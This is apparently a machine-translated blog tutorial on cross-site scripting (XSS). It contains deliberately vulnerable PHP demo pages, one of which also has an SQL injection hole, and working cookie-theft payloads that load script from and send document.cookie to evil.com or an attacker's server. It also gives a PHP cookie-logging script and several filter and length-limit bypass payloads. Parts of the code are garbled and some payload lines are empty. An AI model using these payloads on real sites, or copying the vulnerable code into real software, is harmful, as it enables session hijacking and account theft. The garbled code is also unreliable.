Someone once said that XSS is so popular, because every website, including Google, Microsoft, and so on, there will be an XSS vulnerability! Before the XSS this piece of "fat" just understand, no systematic study. Take advantage of the summer vacation, to systematically analyze this piece of ' fat '.
0x01 XSS Basics
- Cross Site Script
- For Web Client
- From Js/activex/flash ...
JS XSS usage Scenario
- Embed HTML directly:
<script>alert(/xss/);</script>
- Element Tag event:
<body onload=alert(/xss/)>
- Picture Tags:
- Other Tags:
<iframe>,<div>, and <link>
- Dom object, tampering with page content
XSS can be divided into the following categories depending on the effect:
- Reflection Type XSS
- Storage-Type XSS
- Dom Based XSS by modifying the XSS formed by the DOM nodes
Ease of Use: 2>3>1
1234567891011 |
<?php
/*
* 反射型XSS 演示
*/
error_reporting
(0);
$text =
$_GET
[
‘name‘
];
?>
<input type=
"text" id=
"text" value=
"<?php echo $text ?>" />
Payload:?name=">
|
1234567891011121314151617181920212223 |
<?php
/*
* 存储型XSS 演示
*/
error_reporting
(7);
$name =
$_GET
[
‘name‘
];
$conn = mysql_connect(
"127.0.0.1"
,
"root"
,
"5688"
);
mysql_select_db(
"test"
,
$conn
);
mysql_query(
‘set names "utf8"‘
);
$sql_insert =
"insert into liuyan(content) values(‘$name‘)"
;
$result = mysql_query(
$sql_insert
,
$conn
);
$sql_select =
"select * from liuyan"
;
$results = mysql_fetch_array(mysql_query(
$sql_select
));
echo $results
[content];
?> Step 1: ?name=<scRipt>Alert(1)</scrIpt>
Step 2: result
|
123456789101112131415161718 |
<?php
/*
* DOM Based XSS 演示
*/
error_reporting
(0);
$name =
$_GET
[
‘name‘
];
?>
<input id=
"text" type=
"text" value=
"<?php echo $name ?>" />
<div id=
"print"
></div>
<script>
var text = document.getElementById(
‘text‘
);
var print = document.getElementById(
‘print‘
);
print
.innerHTML = text.value;
</script>
Payload: ?name=
|
0x02 XSS Payload
After an XSS attack succeeds, an attacker can control the user's browser by implanting a malicious script on the page of the user's current browser. These malicious scripts, known as "XSS Payload"
Cookie Hijacking
12345678 |
http://www.a.com/test.php?abc="><script src =http://evil.com/evil.js></script> evil.js content: var img = document.createElement("img"); img.src = "http://www.evil.com/log?"+escape(document.cookie); document.body.appendChild(img); PS:log不一定要存在,因为在日志中会记录下这个过程 |
This is the basic process of XSS hijacking cookies, and when you get the user cookie, how do you use it to log into the server? In this process, there are a number of methods, there are two ways:
- Burpsuit Proxy Modify Cookie
- Firefox plugin Data Tamper truncation request Modify Cookie
PHP XSS Cookie require
123456789 |
<?php
$cookie =
$_GET
[
‘c‘
];
$ip =
getenv
(
‘REMOTE_ADDR‘
);
$time = data(
"j F, Y, g:i a"
);
$referer =
getenv
(
‘HTTP_REFERER‘
);
$fp =
fopen
(
‘cookie.txt‘
,
‘a‘
);
fwrite(
$fp
.
‘Cookie: ‘
.
$cookie
.
‘<br/> IP: ‘
.
$ip
.
‘<br> Data and Time: ‘
.
$time
.
‘<br>Referer: ‘
.
$referer
.
‘<br><br>‘
);
fclose(
$fp
);
?>
|
Save the above to your own server, 1.php
Then write to the XSS:
1 |
< script >document.location="http://your server/1.php?c="+document.cookie;</ script > |
Construct get with POST request XSS phishing identify user browser identify user install software CSS history hack get user real ip0x03 XSS attack platform
- Attack API
- BeEF
- Xss-proxy
0x04 XSS worm0x05 XSS Construction Tips
The most basic construction technique is the "closed tag",
Using character encoding
Here's the first one of the things that brother said in the white hat talk about web security is that when the Web page is encoded as gbk/gb2312, the "%c1\" bypasses the system escape "situation ...
The next is the various encryption
URL-encoded Unicode-encoded HTML encoding
The existence of HTML encoding is to let him separate in the code and display, to avoid errors. His named entity: The structure is & with the Greek alphabet, character encoding: Constructs are & #加十进制, hexadecimal ASCII or Unicode character encoding, and browser parsing will first parse the HTML encoding and then render. However, there is a premise that it must be in the "value", such as the attribute src, but the SRC cannot be HTML-encoded. Otherwise the browser will not render properly.
1 |
< img src=logo.png/> |
CSS encoding
Slash/Plus 1-6-bit 16 decimal
common ways to bypass
1234 |
< sCript >alert(1)</ scRipt > < script %20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript> < scr <script>rip>alalertert</ scr </script>rip> (需要利用waf的不完整性) < script >eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</ script > |
Bypassing length limits
12 |
< input type = "text" value = "$var" /> length($var)<=20 |
Method One: Shorten payload by events
Method Two: Use Location.hash to load XSS payload
123456789 |
Payload: " onclick="eval(location.hash.substr(1)) < input type = "text" value = "" onclick = "eval(location.hash.substr(1))" /> location.hash的第一个字符为# 则 http://www.a.com/test.html#alert(1) 产生效果 location.hash本身没有长度限制,而浏览器URL有,在这个范围内都是可以的。 |
Method Three: Use the annotation character to bypass the length limit
123 |
有两个输入框,第一个有限制,第二个没有长度限制,则可以通过注释符打通两个注释框之间的部分: input1#value: "><!-- input2#value: --><script>alert(/xss/);<script/> |
Using labels
The role of tags in HTML is to provide a real address for all links that use relative paths.
This process can be exploited, assuming that you can insert a base tag somewhere on the page and forge a link on your server that payload the corresponding image, you can achieve the attack effect
1 |
< base herf = "http://www.evil.com/" /> |
Window.name Magical
You can use this to achieve cross-domain effects
1234567 |
a.com中, window.name=test location.href="http://www.b.com/xss.php" b.com中,加入 document.domain + window.name 即可轻松实现从a->b的跨越 |
0x06 some wonderful attack tactics third-party hijacking (outward j/c)
Simply speaking is to see your target site references which external sites js/css/swf/, and so on, and then invade the corresponding external station, and then modify the js/css/swf to achieve the effect of XSS, the use of "roundabout" infiltration mode
Here refers to a "long short" write a Get non-site J/C code:
1234567 |
for
(
var i=0,tags=document.querySelectorAll(
‘iframe[src],frame[src],script[src],link[rel=stylesheet],object[data],embed[src]‘
),tag;tag=tags[i];i++){
var a = document.createElement(
‘a‘
);
a.href = tag.src||tag.href||tag.data;
if
(a.hostname!=location.hostname){
console.warn(location.hostname+
‘ 发现第三方资源[‘
+tag.localName+
‘]:‘
+a.href);
}
}
|
Just execute this code in the browser console
0x07 JavaScript Development Framework Xssjquery
jquery has an HTML () method, which, if there are no parameters, reads the innerHTML of a DOM node, and if there is a parameter, it writes the value of the parameter to the innerHTML of the DOM node. This process may produce "DOM Based XSS"
1 |
$( ‘div.demo-contaioner‘ ).html( "); |
In addition, some other example Dojo/yui itself has an XSS vulnerability.
Https://www.ohlinge.cn/web/xss.html
Combining code to learn about the basics of XSS